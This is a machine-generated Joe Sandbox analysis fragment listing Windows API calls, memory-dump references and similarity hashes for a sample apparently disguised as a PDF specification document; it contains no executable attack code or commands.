                                      • GetMenuItemID.USER32(?,?), ref: 003A860E
                                      • GetSubMenu.USER32(?,?), ref: 003A861C
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 003A866D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                      • Instruction ID: 8d67ab3199a4f0513c38bd99b0164db5bac77e968391971d2fa3e3e8660d540f
                                      • Opcode Fuzzy Hash: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                      • Instruction Fuzzy Hash: 64519075E00215AFDB16EF94C941AAEB7F9EF49310F114469F915BB361CB30BE418B90
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • BeginPaint.USER32(?,?,?), ref: 0035AC2A
                                      • GetWindowRect.USER32(?,?), ref: 0035AC8E
                                      • ScreenToClient.USER32(?,?), ref: 0035ACAB
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0035ACBC
                                      • EndPaint.USER32(?,?,?,?,?), ref: 0035AD06
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003BE673
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 2592858361-0
                                      • Opcode ID: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                      • Instruction ID: af20013d1fb102a9ce083687ef840b337980b6ac9d1fc7aeef9baa9c1aae1a3f
                                      • Opcode Fuzzy Hash: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                      • Instruction Fuzzy Hash: C4419F711046009FC712DF28CC84FAA7BF8AB59325F040769FAA4D72B1C731A848EB62
                                      APIs
                                      • ShowWindow.USER32(00401628,00000000,00401628,00000000,00000000,00401628,?,003BDC5D,00000000,?,00000000,00000000,00000000,?,003BDAD1,00000004), ref: 003AE40B
                                      • EnableWindow.USER32(00000000,00000000), ref: 003AE42F
                                      • ShowWindow.USER32(00401628,00000000), ref: 003AE48F
                                      • ShowWindow.USER32(00000000,00000004), ref: 003AE4A1
                                      • EnableWindow.USER32(00000000,00000001), ref: 003AE4C5
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003AE4E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                      • Instruction ID: b2376b8a95128bc298852f0aff836cb3c1a7a2c8266425428163efa8503e32a0
                                      • Opcode Fuzzy Hash: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                      • Instruction Fuzzy Hash: D7414934601151EFDB23CF29C499F947BE9FB4A304F5981B9FA588F2A2C731A842CB51
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 003898D1
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00389908
                                      • EnterCriticalSection.KERNEL32(?), ref: 00389924
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0038999E
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003899B3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003899D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                      • String ID:
                                      • API String ID: 3368777196-0
                                      • Opcode ID: d6638596ea3961ef4e32da76df10bda6f4449e6d1b238467f84cfd0c8cec7196
                                      • Instruction ID: d4655f2b14e37f3da731991401e77713dbb2cb6564ab06d30d349ec468536097
                                      • Opcode Fuzzy Hash: d6638596ea3961ef4e32da76df10bda6f4449e6d1b238467f84cfd0c8cec7196
                                      • Instruction Fuzzy Hash: E6315071900205EFDB12AF95DC85EAAB778FF45311F1480B9F904EB256D774EA14CBA0
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,003977F4,?,?,00000000,00000001), ref: 00399B53
                                        • Part of subcall function 00396544: GetWindowRect.USER32(?,?), ref: 00396557
                                      • GetDesktopWindow.USER32 ref: 00399B7D
                                      • GetWindowRect.USER32(00000000), ref: 00399B84
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00399BB6
                                        • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      • GetCursorPos.USER32(?), ref: 00399BE2
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00399C44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                      • Instruction ID: 27886254afa825554dd752843f187d3fae38fbddfba3e178e39c9f1e13b119d7
                                      • Opcode Fuzzy Hash: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                      • Instruction Fuzzy Hash: BF31CE72104309ABCB11DF58DC49F9AB7EDFF89314F01092AF599E7181DA31EA04CB92
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0037AFAE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0037AFB5
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0037AFC4
                                      • CloseHandle.KERNEL32(00000004), ref: 0037AFCF
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0037AFFE
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 0037B012
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                      • Instruction ID: 59c3f697284a20f1de13860465e0c3d589817398381b45c9fc7b5b4807896afa
                                      • Opcode Fuzzy Hash: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                      • Instruction Fuzzy Hash: 9D214C7210560DABDB238F98DD09FAE7BADAB84304F058025FA05E6161C37A9D21EB61
                                      APIs
                                        • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                        • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003AEC20
                                      • LineTo.GDI32(00000000,00000003,?), ref: 003AEC34
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEC42
                                      • LineTo.GDI32(00000000,00000000,?), ref: 003AEC52
                                      • EndPath.GDI32(00000000), ref: 003AEC62
                                      • StrokePath.GDI32(00000000), ref: 003AEC72
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                      • Instruction ID: 10e02693e4281ec42ee04cdb540c3ab8c68ac7eb6dcfd8681340797fc92827ff
                                      • Opcode Fuzzy Hash: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                      • Instruction Fuzzy Hash: 9E110972000159BFEB029F94DD88EEA7F6DEB08360F048126FE0899170D771AD55DBA0
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0037E1C0
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037E1D1
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037E1D8
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0037E1E0
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0037E1F7
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0037E209
                                        • Part of subcall function 00379AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00379A05,00000000,00000000,?,00379DDB), ref: 0037A53A
                                      Similarity
                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                      • String ID:
                                      • API String ID: 603618608-0
                                      • Opcode ID: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                      • Instruction ID: be28ea4040b067acb2f7443fc8f8100f599c510af706fc6a769e87031e65c7dc
                                      • Opcode Fuzzy Hash: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                      • Instruction Fuzzy Hash: F40184B5A00214BFEB119BA5DC45F5EBFB8EB48351F018066FA08E7290D6719C00CF60
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0034281D
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00342825
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00342830
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0034283B
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00342843
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034284B
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                      • Instruction ID: 1f477a96a6675248c5c5114fe51b1dc9ff7d9e9e1e6656008233e13cb4c09c64
                                      • Opcode Fuzzy Hash: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                      • Instruction Fuzzy Hash: C70167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C87A42C7F5B864CBE5
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 1423608774-0
                                      • Opcode ID: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                      • Instruction ID: 198deadfc95f0b73dc454a571002de4ffd4c9ae2c6a7aea46cfb8d7b300b7ba0
                                      • Opcode Fuzzy Hash: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                      • Instruction Fuzzy Hash: 91016236101311ABD71B3B64EC88EBB7769BF88701B09046AF503D6090DB68A801DB50
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00387C07
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00387C1D
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00387C2C
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C3B
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C45
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C4C
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                      • Instruction ID: 7402b2c631e80050901b9b5598cd48022b576b65c707389c0a4158567e5aca45
                                      • Opcode Fuzzy Hash: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                      • Instruction Fuzzy Hash: E7F05E76241158BBE7225B529C0EEEFBF7CEFC6B11F000068FA01D1151EBA06A41C7B5
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00389A33
                                      • EnterCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A44
                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A51
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A5E
                                        • Part of subcall function 003893D1: CloseHandle.KERNEL32(?,?,00389A6B,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 003893DB
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00389A71
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A78
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                      • Instruction ID: 888a656e4762e63aa23637427b8c8d6dba5f537ee0bc72c27d7c183b3014058a
                                      • Opcode Fuzzy Hash: 69e495f64d124ad28709d3fdddb41abe10afa89d74f027f473b67b2e0d10cc40
                                      • Instruction Fuzzy Hash: F5F05E36141211ABD7172BA4EC89EAA772DFF84301F190876F503D50A0DBB9A801DB50
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0039B006
                                      • CharUpperBuffW.USER32(?,?), ref: 0039B115
                                      • VariantClear.OLEAUT32(?), ref: 0039B298
                                        • Part of subcall function 00389DC5: VariantInit.OLEAUT32(00000000), ref: 00389E05
                                        • Part of subcall function 00389DC5: VariantCopy.OLEAUT32(?,?), ref: 00389E0E
                                        • Part of subcall function 00389DC5: VariantClear.OLEAUT32(?), ref: 00389E1A
                                      Strings
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                      • Instruction ID: 01e8f49947b6efb1bfe7c709583ba47fa7f3009c7d72d66e56df4d3a07e6b68b
                                      • Opcode Fuzzy Hash: b9d3d5984951b042886c80cad00aebf882fa8838dea76ac26d4aec8670459c23
                                      • Instruction Fuzzy Hash: 49916A746083019FCB12DF24D58595BBBE8EF89704F04486EF89A9B362DB31ED05CB52
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003802B1
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003802C2
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00380344
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                      • Instruction ID: 9ffe86564346fb34d576bd6a506658055ee4a4f7eec926631ce95dbc043f3fad
                                      • Opcode Fuzzy Hash: 0b68a0904ba6d8f7c62334538cede5bcb574b2a8d2eebd266811a092c5614060
                                      • Instruction Fuzzy Hash: D8413C75600304EFDB8ADF64C885B9A7BA9EF44310B1580ADA909DF206D7F1DA48CBA0
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0038E742
                                      • GetLastError.KERNEL32(?,00000000), ref: 0038E768
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0038E78D
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0038E7B9
                                      Strings
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID: p1Kw`KLw
                                      • API String ID: 3321077145-1011832795
                                      • Opcode ID: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                      • Instruction ID: 2ff098c2a796eee4ca73aa37b4c36312a3d35776551f50e8bec26eef5fec9659
                                      • Opcode Fuzzy Hash: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                      • Instruction Fuzzy Hash: 494102396006109FCB12AF55C444A4EBBE5BF9A720B198499F946AF3B2CB74FD008B91
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 003A0587
                                      Strings
                                      Similarity
                                      • API ID: BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 2358735015-567219261
                                      • Opcode ID: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                      • Instruction ID: 66922b11276190e711b0bcd1b731ccf5836ed2d060b89ee14986d8719a9ed267
                                      • Opcode Fuzzy Hash: 39b95d1491ffe9c8d56f2b90adf5b158520746cb2ea6caf11db79d23450101f5
                                      • Instruction Fuzzy Hash: E531923091021AAFCF06EF54C8419EEB3B4FF56314B104629E866AB6E1DB71E915CB80
                                      APIs
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0037B88E
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0037B8A1
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 0037B8D1
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: d9d699619c24ca5905c8c1e6db8adb0550b35e097d5a547a84f1ebb2801a1a59
                                      • Instruction ID: 1685acd96d17723b135c38fd7fd72acc1a4291d3988349c0d73db05213e92761
                                      • Opcode Fuzzy Hash: d9d699619c24ca5905c8c1e6db8adb0550b35e097d5a547a84f1ebb2801a1a59
                                      • Instruction Fuzzy Hash: F521F671900108BFDB269B64D886EFEB7BCDF06350F108129F565AB1E0DB785D0A9760
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00394427
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00394457
                                      • InternetCloseHandle.WININET(00000000), ref: 0039449E
                                        • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                      Strings
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 1951874230-3916222277
                                      • Opcode ID: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                      • Instruction ID: 56628d566580987b3286291d56a1ddea5114e0dabbf85f5ca49c438e74d8545a
                                      • Opcode Fuzzy Hash: 0dbfbf3135b04dcf38de5443f552d8c7d6d435566cbd4bc8111ddcb8b0fcbc58
                                      • Instruction Fuzzy Hash: E6219FB2500208BFEB139F55CC85EBFB6FCEB48B48F11802AF509E6240EA749D069771
                                      APIs
                                        • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                        • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                        • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003A915C
                                      • LoadLibraryW.KERNEL32(?), ref: 003A9163
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003A9178
                                      • DestroyWindow.USER32(?), ref: 003A9180
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                      • Instruction ID: c36df3370eec123d1add2d2f1523054229c21b743e25463236ef8793aca35a8a
                                      • Opcode Fuzzy Hash: b28ac6d1990f4c8062c8bbee4bdf0668605b99acd9a6681c744cacad6779e659
                                      • Instruction Fuzzy Hash: AA21A171200206BBEF224F64DC84FBB37ADEF9A364F11462AF954E6190C735DC52A760
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00389588
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003895B9
                                      • GetStdHandle.KERNEL32(0000000C), ref: 003895CB
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00389605
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                      • Instruction ID: 3810732b695f9c1af9bbca2ae109d9c6f4500277782ab3c387fede9884c2104e
                                      • Opcode Fuzzy Hash: d85a09dbf6dfeeb906c511657bb705d3f6d6dcbeee7b668b787266612fae1dfa
                                      • Instruction Fuzzy Hash: 1C215170600305ABDB22AF65DC05FAE77E8AF46724F244A6AF9A1D72D0D770E944CB10
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00389653
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00389683
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00389694
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003896CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
                                      • Instruction ID: 60905a4f2a1b963e4bb784ddee4f7790b56d9c9ebbf04ade834b8298cf796abf
                                      • Opcode Fuzzy Hash: c3c217755cbf0607f6db1a04c5f6f4215252384c9da61cc428830463222554ce
